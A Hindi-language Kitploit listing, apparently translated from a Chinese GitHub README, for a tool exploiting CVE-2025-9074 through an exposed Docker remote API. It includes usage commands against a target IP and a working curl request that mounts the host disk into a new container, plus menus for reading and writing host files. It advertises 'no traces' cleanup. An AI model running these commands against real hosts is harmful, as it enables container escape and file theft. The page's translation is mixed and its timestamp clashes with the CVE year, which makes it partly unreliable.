Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-9074-Docker-Exploit — CVE-2025-9074 भेद्यता के सुरक्षा अनुसंधान और परीक्षण के लिए एक शक्तिशाली Docker रिमोट API शोषण उपकरण। | Kitploit
उपकरण/GitHubGitHub/shaoshi17/cve-2025-9074-docker-exploit
कंटेनर सुरक्षाभेद्यता विश्लेषणशोषणपेनिट्रेशन टेस्टिंगक्लाउड सुरक्षारेड टीमिंगकंटेनर एस्केप
GitHubshaoshi17/cve-2025-9074-docker-exploit

CVE-2025-9074-Docker-Exploit

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-9074 भेद्यता के सुरक्षा अनुसंधान और परीक्षण के लिए एक शक्तिशाली Docker रिमोट API शोषण उपकरण।

रिपॉजिटरी देखें
127 महीने पहलेअभी तक समीक्षित नहीं

CVE-2025-9074 Docker कंटेनर कमांड निष्पादन उपकरण

CVE-2025-9074 भेद्यता के सुरक्षा अनुसंधान और परीक्षण के लिए एक शक्तिशाली Docker रिमोट API शोषण उपकरण।

मुख्य लाभ

✅ पूर्णतः स्वचालित कंटेनर जीवनचक्र प्रबंधन: अस्थायी कंटेनर स्वचालित रूप से बनाता है, ऑपरेशन पूरा होने के बाद स्वचालित रूप से साफ करता है, कोई निशान नहीं छोड़ता
✅ स्मार्ट पथ प्रबंधन: Windows पथों को स्वचालित रूप से पहचानकर Docker माउंट प्रारूप में परिवर्तित करता है
✅ पूर्णतः स्वचालित संचालन प्रक्रिया: जटिल कमांड मैन्युअल रूप से दर्ज करने की आवश्यकता नहीं, मेनू-आधारित इंटरैक्शन, एक क्लिक में फ़ाइल संचालन पूर्ण करता है
✅ क्रॉस-प्लेटफ़ॉर्म संगतता: Windows और Linux सिस्टम का पूर्ण समर्थन करता है

कुछ सुविधाओं के स्क्रीनशॉट

image

विशेषताएँ

  • कंटेनर संचालन

    • चल रहे कंटेनर देखें
    • सभी कंटेनर देखें (रुके हुए सहित)
    • नया कंटेनर बनाएं
    • कंटेनर रोकें
    • कंटेनर हटाएं
    • एकल कमांड निष्पादन
    • इंटरैक्टिव टर्मिनल (docker लाइब्रेरी आवश्यक)
  • इमेज प्रबंधन

    • स्थानीय इमेज देखें
    • नई इमेज खींचें
    • इमेज हटाएं
  • होस्ट मशीन फ़ाइल संचालन

    • होस्ट मशीन पर फ़ाइल अपलोड करें
    • होस्ट मशीन से फ़ाइल डाउनलोड करें
    • होस्ट मशीन फ़ाइल सामग्री पढ़ें
    • होस्ट मशीन में फ़ाइल लिखें
    • Windows Docker Desktop पथ मैपिंग को स्वचालित रूप से संभालता है

भेद्यता विवरण

CVE-2025-9074 Docker रिमोट API की एक सुरक्षा भेद्यता है। हमलावर Docker API तक अनधिकृत पहुंच प्राप्त करके निम्न कार्य कर सकते हैं:

  • मनमाना कमांड निष्पादित करना
  • कंटेनर बनाकर होस्ट मशीन डिस्क माउंट करना
  • कंटेनर एस्केप प्राप्त करना
  • होस्ट मशीन फ़ाइलें पढ़ना/लिखना

पर्यावरण आवश्यकताएँ

  • Python 3.6+

निर्भरताएँ स्थापित करें

requirements.txt का उपयोग करके सभी निर्भरताएँ स्थापित करें:

root@kitploit:~
pip install -r requirements.txt

या मैन्युअल रूप से स्थापित करें:

root@kitploit:~
pip install requests docker websocket-client

उपयोग विधि

मूल उपयोग

डिफ़ॉल्ट Docker API पते का उपयोग करके स्क्रिप्ट को सीधे चलाएं:

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

कस्टम Docker API पता

root@kitploit:~
python CVE-2025-9074-docker-exploit.py -u http://192.168.1.100:2375

कमांड लाइन पैरामीटर

root@kitploit:~
python CVE-2025-9074-docker-exploit.py [选项]

选项:
  -u, --url URL         Docker API 地址(默认: http://192.168.65.7:2375)

विस्तृत विशेषताएँ

कंटेनर संचालन

  1. चल रहे कंटेनर देखें: सभी चल रहे कंटेनरों की सूची प्रदर्शित करता है
  2. सभी कंटेनर देखें: सभी कंटेनर प्रदर्शित करता है (रुके हुए सहित)
  3. नया कंटेनर बनाएं: निर्दिष्ट इमेज का उपयोग करके नया कंटेनर बनाता है
  4. कंटेनर रोकें: चल रहे कंटेनर को रोकता है
  5. कंटेनर हटाएं: कंटेनर हटाता है (बलपूर्वक हटाया जा सकता है)
  6. एकल कमांड निष्पादन: कंटेनर में एक कमांड निष्पादित करता है
  7. इंटरैक्टिव टर्मिनल: कंटेनर के इंटरैक्टिव शेल में प्रवेश करता है (docker लाइब्रेरी आवश्यक)

इंटरैक्टिव टर्मिनल का उपयोग करना

  1. स्क्रिप्ट चलाने के बाद "1. कंटेनर संचालन" चुनें
  2. "1. चल रहे कंटेनर देखें" चुनें
  3. कंटेनर चुनने के लिए कंटेनर क्रमांक दर्ज करें
  4. "2. इंटरैक्टिव टर्मिनल (docker लाइब्रेरी आवश्यक)" चुनें
  5. shell कमांड दर्ज करें (डिफ़ॉल्ट: /bin/sh)
  6. इंटरैक्टिव संचालन आरंभ करें

इमेज प्रबंधन

  1. इमेज देखें: सभी स्थानीय इमेज सूचीबद्ध करता है
  2. इमेज खींचें: Docker Hub से नई इमेज खींचता है
  3. इमेज हटाएं: स्थानीय इमेज हटाता है

होस्ट मशीन फ़ाइल संचालन

होस्ट मशीन पर फ़ाइल अपलोड करें

root@kitploit:~
1. 上传文件到宿主机
请输入本地文件路径: /path/to/local/file.txt
请输入宿主机目标目录: D:/temp
请输入目标文件名 (留空则使用原文件名): 

होस्ट मशीन से फ़ाइल डाउनलोड करें

root@kitploit:~
2. 从宿主机下载文件
请输入宿主机文件路径: D:/temp/file.txt
请输入本地保存路径: /tmp

होस्ट मशीन फ़ाइल सामग्री पढ़ें

root@kitploit:~
3. 读取宿主机文件内容
请输入宿主机文件路径: D:/temp/file.txt

होस्ट मशीन में फ़ाइल लिखें

root@kitploit:~
4. 向宿主机写入文件
请输入宿主机目标目录: D:/temp
请输入文件内容: Hello, World!

Windows Docker Desktop पथ मैपिंग

यह उपकरण Windows Docker Desktop की पथ मैपिंग को स्वचालित रूप से संभालता है:

Windows पथDocker माउंट पथ

समर्थित इनपुट प्रारूप:

  • D:\ या D:/
  • D:\temp या D:/temp
  • "D:\file.txt" (उद्धरण चिह्नों के साथ)
  • 'D:/file.txt' (उद्धरण चिह्नों के साथ)

सुरक्षा सावधानियाँ

⚠️ महत्वपूर्ण सूचना:

  1. केवल अधिकृत परीक्षण के लिए: यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है
  2. कानूनी अनुपालन: उपयोग से पहले सुनिश्चित करें कि आपको लक्ष्य सिस्टम से स्पष्ट प्राधिकरण प्राप्त है
  3. पृथक वातावरण: पृथक परीक्षण वातावरण में उपयोग करने की अनुशंसा की जाती है
  4. अनुमति प्रतिबंध: C ड्राइव में लिखने के लिए Windows Docker Desktop को व्यवस्थापक के रूप में चलाना आवश्यक है
  5. दुरुपयोग न करें: अनधिकृत रूप से इस उपकरण का उपयोग करना कानूनों और विनियमों का उल्लंघन हो सकता है

तकनीकी सिद्धांत

कंटेनर एस्केप

Docker API के माध्यम से कंटेनर बनाकर होस्ट मशीन डिस्क माउंट करें:

root@kitploit:~
curl -X POST "http://<target>:2375/containers/create" \
  -H "Content-Type: application/json" \
  -d '{
    "Image": "python:3.11.7",
    "Cmd": ["sleep", "999d"],
    "HostConfig": {
      "Binds": ["/mnt/host/d:/tmp"]
    },
    "Tty": true
  }'

फ़ाइल पढ़ना/लिखना

कंटेनर में कमांड निष्पादित करके होस्ट मशीन फ़ाइलें पढ़ें/लिखें:

root@kitploit:~
# 写入文件
echo "content" > /tmp/file.txt

# 读取文件
cat /tmp/file.txt

समस्या निवारण

कंटेनर निर्माण विफल (500 त्रुटि)

  • जाँचें कि Docker API सुलभ है या नहीं
  • सत्यापित करें कि पथ प्रारूप सही है
  • सत्यापित करें कि इमेज मौजूद है

फ़ाइल लेखन विफल

  • Windows Docker Desktop को व्यवस्थापक के रूप में चलाना आवश्यक है
  • लक्ष्य निर्देशिका की अनुमति सेटिंग्स जाँचें

इंटरैक्टिव टर्मिनल प्रारंभ नहीं हो सका

  • सुनिश्चित करें कि docker लाइब्रेरी स्थापित है: pip install docker websocket-client
  • जाँचें कि टर्मिनल इंटरैक्टिव मोड का समर्थन करता है या नहीं

विकास और परीक्षण

परीक्षण चलाएं

root@kitploit:~
python CVE-2025-9074-docker-exploit.py

कोड संरचना

root@kitploit:~
CVE-2025-9074-docker-exploit.py
├── 容器管理函数
│   ├── get_containers()
│   ├── display_containers()
│   ├── create_container()
│   ├── stop_container()
│   └── delete_container()
├── 镜像管理函数
│   ├── get_images()
│   ├── display_images()
│   ├── pull_image()
│   └── remove_image()
├── 宿主机文件操作函数
│   ├── upload_file_to_host()
│   ├── download_file_from_host()
│   ├── read_file_from_host()
│   └── write_file_to_host()
└── 工具函数
    ├── normalize_host_path()
    ├── create_container_with_mount()
    ├── start_container()
    └── stop_and_remove_container()

योगदान

Issue और Pull Request सबमिट करने के लिए आपका स्वागत है!

लाइसेंस

यह परियोजना केवल शैक्षिक और सुरक्षा अनुसंधान उद्देश्यों के लिए है।

अस्वीकरण

यह उपकरण केवल अधिकृत सुरक्षा परीक्षण और शैक्षिक उद्देश्यों के लिए है। उपयोगकर्ता इस उपकरण के उपयोग से उत्पन्न सभी जिम्मेदारी और जोखिम स्वयं वहन करेगा। लेखक किसी भी दुरुपयोग या अनधिकृत उपयोग के लिए उत्तरदायी नहीं होगा।

संदर्भ सामग्री

  • CVE-2025-9074 भेद्यता विवरण
  • Docker Remote API दस्तावेज़
  • Windows Docker Desktop पथ मैपिंग नियम
टूल डाउनलोड करें
D:\/mnt/host/d
D:\temp/mnt/host/d/temp
C:\Windows/mnt/host/c/Windows
C:\Users\test/mnt/host/c/Users/test